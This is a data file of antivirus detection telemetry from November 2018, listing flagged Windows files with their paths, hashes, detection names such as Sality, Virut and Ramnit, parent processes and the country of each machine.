  Row(detection=Row(filename='downtown.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\DATA\\MAPS\\DOWNTOWN\\DOWNTOWN.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='71b3716790f24005c718fe95ca3d648c80c4a4af6d9ddc9a4a0ced9ef91a9f7c', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:25:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files (x86)\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:16:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wmplayer.exe', filepath='C:\\Program Files\\Windows Media Player\\wmplayer.exe', filesize=256000, name='W32/Virut.Gen.#M1.#R1'), hash='1f06e353466caf56f94fcd51601058b7064dd9dca386e84e4636a7e8a661078f', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T16:22:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='3c3f20999efcb82259fe2ae42213e3c914e84535b917f10d7e622058896808c5', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\3C3F20999EFCB82259FE2AE42213E3C914E84535B917F10D7E622058896808C5', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='3c3f20999efcb82259fe2ae42213e3c914e84535b917f10d7e622058896808c5', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T11:20:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='0_5_0_0.html', filepath='C:\\Users\\This\\AppData\\Local\\VirtualStore\\Program Files (x86)\\Adobe\\Photoshop 7.0\\Help\\0_5_0_0.html', filesize=220000, name='VBS/Ramnit.abcd.#M0.#R0'), hash='4c7a4b1c1c0e1ee5461aa433dd9229d5f85a7a28dfbc44ef9a52944af0756a8f', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T10:38:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ophcrack.exe', filepath="D:\\2016\\Hiren's BootCD 15.2 Rebuild All in One Bootable CD\\Hiren's BootCD 15.2 Rebuild All in One Bootable CD\\12.Hiren.s.Boot.CD.15.2\\HBCD\\Programs\\OPHCrack.exe", filesize=64000, name='TR/Agent.64000.101.#M1.#R1'), hash='28d02d53172d5486e395b7cc2768e91b922defe83fe554f97d652a3879527a70', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2755504, timestamp='2018-11-02T03:17:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='removeassinaturapramim.exe', filepath='C:\\Users\\X\\Desktop\\RemoveAssinaturaPraMim\\RemoveAssinaturaPraMim.exe', filesize=512000, name='TR/Spy.Banker.Gen.#M300.#R3644'), hash='6f1e01d3c6ba1641c7b10604ac1c392b8133912c6b04f8a6d9c4750ebb5c15e6', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:48:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-155945-ebb03c4f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0858748c\\AVSCAN-20181102-155607-D410DE34\\AVSCAN-20181102-155945-EBB03C4F', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:59:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='danh sách cán bộ.exe', filepath='H:\\\xa0\\danh sách cán bộ.exe', filesize=1664000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='6bec22bb60acd389fcc3f637a290f11b089a27eadac451fe57616460d537aa47', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-02T01:25:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='pfsmerge.exe', filepath='C:\\Program Files\\DHI\\2009\\bin\\pfsmerge.exe', filesize=384000, name='DR/Delphi.Gen.#M300.#R3883'), hash='106350d96b0849401dbd3c2c0635f2da90fe30d9a37e2ace90d9b919db5a3fc8', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:10:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\flashupdate.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='5f28ee2b6f85211912fd7283bc72088a22b75457293cfa31a4b3428ac82f35a4', metadata=Row(cmdline=None, country='BG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:53:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files (x86)\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T01:43:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\flashupdate.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='5f28ee2b6f85211912fd7283bc72088a22b75457293cfa31a4b3428ac82f35a4', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2328880, timestamp='2018-11-02T16:11:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='12.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\AMMO\\12\\12.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='2593ba0a28981e3448337a8e2379014eaefb919a6c4272bed565c82b425f30f9', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:39:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='qualcomm+premium+tool+v24.exe', filepath='C:\\Users\\X\\Downloads\\Qualcomm+Premium+Tool+v24.exe', filesize=2624000, name='HEUR/AGEN.1017528.#M1.#R1'), hash='23f1dc5ebee68a180146fb4cada07dcaad2bbb9822292da223112bb2dbc2b8e7', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Internet Explorer\\iexplore.exe', parentsize=817240, timestamp='2018-11-02T14:21:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='4935812.vir', filepath='\\\\?\\C:\\Program Files (x86)\\Bring\\4935812.VIR', filesize=1024000, name='Adware/CsdiMonetize.udgxz.#M1.#R1'), hash='3cf92b23871c00df72e252f8aa0fb6d33aa1ce37796088d40e0a1f2e0a936660', metadata=Row(cmdline=None, country='CR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T00:16:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='31843f8c126110a469d72b6d1d5c60193a4888c8f86831aa240b0be790ae6749', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-8\\31843F8C126110A469D72B6D1D5C60193A4888C8F86831AA240B0BE790AE6749', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='31843f8c126110a469d72b6d1d5c60193a4888c8f86831aa240b0be790ae6749', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:25:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:44:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:59:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='starisl.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\DATA\\MAPS\\STARISL\\STARISL.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='1320b4bef6bca83e6e5347ff8718e51c7d01b00eb5b2eccf9c2755c0fff930cd', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:25:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transfer.exe', filepath='\\\\?\\C:\\C-GEO\\bin\\transfer.exe', filesize=640000, name='HEUR/APC.#M1.#R1'), hash='3f55ca75850001e31add3eb2261f3453e9d7a3f4648f9cbb76266171908c75b1', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:03:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='downloads.exe', filepath='C:\\Users\\X\\Downloads\\Downloads.exe', filesize=512000, name='TR/Drop.Agent.cpg.#M1.#R1'), hash='0d20ee5ac1e8c31329221f09fab4a4350258c2c82cf66133e3941c823fbc3a12', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:37:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='dyne repair utility.exe', filepath='D:\\Dyne1\\DYNECC\\Dyne Repair Utility.exe', filesize=96000, name='TR/Patched.Ren.Gen.#M300.#R3807'), hash='2e26e33a68c31f79c353990911a4d18e9d1626ec0d135aeb1746636bcddad6e4', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='OM', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-02T04:55:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:30:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='patcher.exe', filepath='D:\\Installer\\Sketchup2015\\SketchUp Pro 2015 v15.2.687 (x86)  & v15.2.685 (x64)\\SketchUp Pro 2015 v15.2.687 (32-Bit)\\Patcher.exe', filesize=320000, name='W32/Ramnit.C.#M1.#R1'), hash='214ebfd2cb0da5ca9489b715f78aa5d3e48c03c472e533f13686c3991f6cdb69', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:f7byY\\\\\\/G42EOSw8wg.1', country='PH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T03:15:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='iocedc48cef-66b1-e048-a5dc-7d7a2d599a05.exe', filepath='C:\\ProgramData\\Kaspersky Lab\\AVP18.0.0\\Temp\\iocEDC48CEF-66B1-E048-A5DC-7D7A2D599A05.exe', filesize=16416000, name='TR/Patched.Ren.Gen.#M300.#R4405'), hash='153672a8a39883d8fb5baf76454c9145ca648f8b6f3b8d32afe39dd96807095d', metadata=Row(cmdline='-r', country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Kaspersky Lab\\Kaspersky Anti-Virus 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-02T18:47:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='e_s50st7.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\{C6E639E3-12B6-4CA3-BE05-00E533F97068}\\E_S50ST7.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='03bb807416637190950ce5e22b75847cdb92bb46d52eefe66bdcc5e34261f60e', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-02T05:42:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-090545-372ec55b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a8770ece\\AVSCAN-20181102-090521-346214E2\\AVSCAN-20181102-090545-372EC55B', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:05:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='xpddm.dll', filepath='C:\\orant\\BIN\\XPDDM.DLL', filesize=320000, name='W32/Ramnit.CD.#M1.#R1'), hash='23b0f6656ea0071ca70c1a63498bd3ffcc69ee48893c62f941d76753695186ba', metadata=Row(cmdline=None, country='PK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T06:43:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:59:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='a190_calc.exe', filepath='c:\\users\\X\\documents\\ansys 19.0\\ansys 19.0\\crack\\a190_calc.exe', filesize=768000, name='HEUR/APC.#M1.#R1'), hash='04239a5a53d71e87acf2a3ae5873657ccbbbd8fd6e6c39562ccaa8fe2859b7dd', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T11:16:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:50:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:49:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:25:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:19:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:42:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:44:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-101018-8a31ae8d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d314a8ab\\AVSCAN-20181102-100950-86087889\\AVSCAN-20181102-101018-8A31AE8D', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T08:10:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:38:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:43:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:34:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='elf.exe', filepath='I:\\ألعاب\\Games 1\\بولنج\\MIXOLGY.NET_Bowling.Hawaiian.Vacationd. _By  MIDOPOP\\sfx\\sounds\\elf\\elf.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='607dc9068a416a57dbd52e6cd60ab12dc6e481e5dd7eb93465cf3752df6b259d', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:41:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053106-7779efdf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053106-7779EFDF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:31:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EX92.752\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EX92.752\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T08:07:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='cooler.exe', filepath='I:\\ألعاب\\Games 1\\Dd251.N\\chars\\Cooler\\Cooler.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='51636ec1b5e4820e85f5edc9d934225779cba2d31f0cf9a99d78fa7e1cb953cb', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:38:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061421-82734cb2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061421-82734CB2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:14:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051907-cafc056c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051907-CAFC056C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:19:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp00006e7d', filepath='C:\\Windows\\Temp\\tmp000051a3\\tmp00006e7d', filesize=12800000, name='TR/Patched.Ren.Gen2.#M300.#R100581'), hash='65fcda0873434db6111c155ab64853d9f0c3075d6c49f350bf9e31fc1e4f9916', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\BDServices\\BitDefenderCOM.exe', parentsize=1028096, timestamp='2018-11-02T02:01:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup_winthruster_2016.exe', filepath='C:\\Users\\X\\Downloads\\Setup_WinThruster_2016.exe', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T22:09:21Z'), dt=datetime.date(2018, 11, 2)),
